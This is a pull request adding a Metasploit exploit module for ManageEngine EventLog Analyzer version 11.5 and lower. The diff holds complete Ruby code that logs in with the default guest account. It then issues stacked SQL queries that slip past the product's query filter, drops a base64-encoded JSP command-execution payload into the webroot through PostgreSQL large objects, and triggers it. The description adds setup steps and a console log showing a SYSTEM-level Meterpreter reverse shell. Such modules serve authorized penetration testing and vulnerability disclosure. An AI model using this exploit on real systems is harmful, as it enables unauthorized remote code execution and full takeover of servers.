### PR TITLE
ManageEngine EventLog Analyzer Remote Code Execution

### DIFF
--- a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb
+++ b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb
@@ -1,0 +1,219 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "ManageEngine EventLog Analyzer Remote Code Execution",
+      'Description'    => %q{
+        This module exploits a SQL query functionality in ManageEngine EventLog Analyzer.
+        Every authenticated user, including the default "guest" account can execute SQL queries directly
+        on the underlaying Postres database server. The queries are executed as the "postgres" user
+        which has full privileges and thus is able to write files to disk. This way a JSP payload
+        can be uploaded and executed with SYSTEM privileges on the web server.
+       },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '38173' ],
+        ],
+      'Platform'       => ['win'],
+      'Arch'           => ARCH_X86,
+      'Targets'        =>
+        [
+          ['ManageEngine EventLog Analyzer', {}]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Jul 11 2015",
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          Opt::RPORT(8400),
+          OptString.new('USERNAME', [ true, 'The username to authenticate as', 'guest' ]),
+          OptString.new('PASSWORD', [ true, 'The password to authenticate as', 'guest' ]),
+          OptInt.new('WAIT', [true, 'Seconds to wait for execution of the payload', 5]),
+        ], self.class)
+ end
+
+  def uri
+    return target_uri.path
+  end
+
+
+  def check
+    # Check version
+    vprint_status("#{peer} - Trying to detect ManageEngine EventLog Analyzer")
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(uri, "event", "index3.do")
+    })
+
+    if res && res.code == 200 && res.body =~ /ManageEngine EventLog Analyzer/
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+
+  def sql_query( cookies, query )
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(uri, "event", "runQuery.do"),
+      'cookie' => cookies,
+      'vars_post' => {
+        'execute' => 'true',
+        'query' => query,
+      }
+    })
+
+    unless res && res.code == 200
+      fail_with(Failure::Unknown, "#{peer} - Failed executing SQL query!")
+    end
+
+    return res
+  end
+
+
+  def generate_jsp_payload(cmd)
+
+    decoder = rand_text_alphanumeric(4 + rand(32 - 4))
+    decoded_bytes = rand_text_alphanumeric(4 + rand(32 - 4))
+    cmd_array = rand_text_alphanumeric(4 + rand(32 - 4))
+    jcode = "<%"
+    jcode <<  "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
+    jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"
+    jcode << "String [] #{cmd_array} = new String[3];\n"
+    jcode << "#{cmd_array}[0] = \"cmd.exe\";\n"
+    jcode << "#{cmd_array}[1] = \"/c\";\n"
+    jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n"
+    jcode << "Runtime.getRuntime().exec(#{cmd_array});\n"
+    jcode << "%>"
+
+    return jcode
+  end
+
+
+  def exploit
+
+    print_status("#{peer} - Retrieving JSESSION ID")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(uri, "event", "index3.do"),
+    })
+
+    if res && res.code == 200 && res.get_cookies =~ /JSESSIONID=(\w+);/
+      jsessionid = $1
+      print_status("#{peer} - JSESSION ID Retrieved [ #{jsessionid} ]")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Unable to retrieve JSESSION ID!")
+    end
+
+    print_status("#{peer} - Access login page")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(uri, "event", "j_security_check;jsessionid=#{jsessionid}"),
+      'vars_post' => {
+        'forChecking' => 'null',
+        'j_username' => datastore['USERNAME'],
+        'j_password' => datastore['PASSWORD'],
+        'domains' => "Local Authentication\r\n",
+        'loginButton' => 'Login',
+        'optionValue' => 'hide'
+      }
+    })
+
+    if res && res.code == 302
+      redirect =  URI(res.headers['Location'])
+      print_status("#{peer} - Location is [ #{redirect} ]")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")
+    end
+
+
+    # Follow redirection process
+    print_status("#{peer} - Following redirection")
+    res = send_request_cgi({
+      'uri' => "#{redirect}",
+      'method' => 'GET'
+    })
+
+    if res && res.code == 200 && res.get_cookies =~ /JSESSIONID/
+      cookies = res.get_cookies
+      print_status("#{peer} - Logged in, new cookies retrieved [#{cookies}]")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Redirect failed, unable to login with provided credentials!")
+    end
+
+
+    jsp_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.jsp'
+
+    cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+    jsp_payload = Rex::Text.encode_base64(generate_jsp_payload(cmd)).gsub(/\n/, '')
+
+
+    print_status("#{peer} - Executing SQL queries")
+
+    # Remove large object in database, just in case it exists from previous exploit attempts
+    sql = "SELECT lo_unlink(-1)"
+    result = sql_query(cookies, sql)
+
+    # Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks.
+    sql = "SELECT lo_create(-1)"
+    result = sql_query(cookies, sql)
+    if result.body =~ /menuItemRow\">([0-9]+)/
+      loid = $1
+    else
+      fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!")
+    end
+
+    select_random = rand_text_numeric(2 + rand(6 - 2))
+    # Insert JSP payload into the pg_largeobject table. We have to use "SELECT" first to to bypass OpManager's checks for queries starting with INSERT/UPDATE/DELETE, etc.
+    sql = "SELECT #{select_random};INSERT INTO/**/pg_largeobject/**/(loid,pageno,data)/**/VALUES(#{loid}, 0, DECODE('#{jsp_payload}', 'base64'));--"
+
+
+    result = sql_query(cookies, sql)
+
+    # Export our large object id data into a WAR file
+    sql = "SELECT lo_export(#{loid}, '..//..//webapps//event/#{jsp_name}');"
+
+    sql_query(cookies, sql)
+
+    # Remove our large object in the database
+    sql = "SELECT lo_unlink(-1)"
+    result = sql_query(cookies, sql)
+
+    register_file_for_cleanup("..\\webapps\\event\\#{jsp_name}")
+
+    print_status("#{peer} - Executing JSP payload")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(uri, jsp_name),
+    })
+
+    sleep(datastore['WAIT'])
+
+    # If the server returns 200 we assume we uploaded and executed the payload file successfully
+    if not res or res.code != 200
+      fail_with(Failure::Unknown, "#{peer} - Payload not executed, aborting!")
+    end
+
+  end
+
+end


### PR DESCRIPTION
This module exploits ManageEngine 11.5 and lower by abusing an authenticated account (default guest user). After login SQL queries are executed on the PostgreSQL backend to write a JSP payload to disk, which gets executed and provides a shell.

Download ManageEngine EventLog Analuzer from: https://www.manageengine.com/products/eventlog/91517554/ManageEngine_EventLogAnalyzer_64bit.exe

Run the installer and chose the One-Click installer (Tested on a Windows 7 64-bit VM)

Run the exploit module:

msf exploit(manageengine_opmanager_rce) > use exploit/windows/misc/manageengine_eventlog_analyzer_rce
msf exploit(manageengine_eventlog_analyzer_rce) > set RHOST 192.168.2.114
RHOST => 192.168.2.114
msf exploit(manageengine_eventlog_analyzer_rce) > exploit

[*] Started reverse handler on 192.168.2.123:4444
[*] 192.168.2.114:8400 - Retrieving JSESSION ID
[*] 192.168.2.114:8400 - JSESSION ID Retrieved [ 0EAEFE61D225DAD280DAC71CF5A0A5FE ]
[*] 192.168.2.114:8400 - Access login page
[*] 192.168.2.114:8400 - Location is [ http://192.168.2.114:8400/event/index3.do;jsessionid=0EAEFE61D225DAD280DAC71CF5A0A5FE ]
[*] 192.168.2.114:8400 - Following redirection
[*] 192.168.2.114:8400 - Logged in, new cookies retrieved [JSESSIONID=3BD989A255E976E24EA7E2A74BE39E10; JSESSIONIDSSO=30D7117EC3A50FD5BDFB41715CC438A1;]
[*] 192.168.2.114:8400 - Executing SQL queries
[*] 192.168.2.114:8400 - Executing JSP payload
[*] Sending stage (884782 bytes) to 192.168.2.114
[*] Meterpreter session 4 opened (192.168.2.123:4444 -> 192.168.2.114:49256) at 2015-09-12 17:27:14 +0700
[+] Deleted ..\webapps\event\J4hr1t.jsp

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
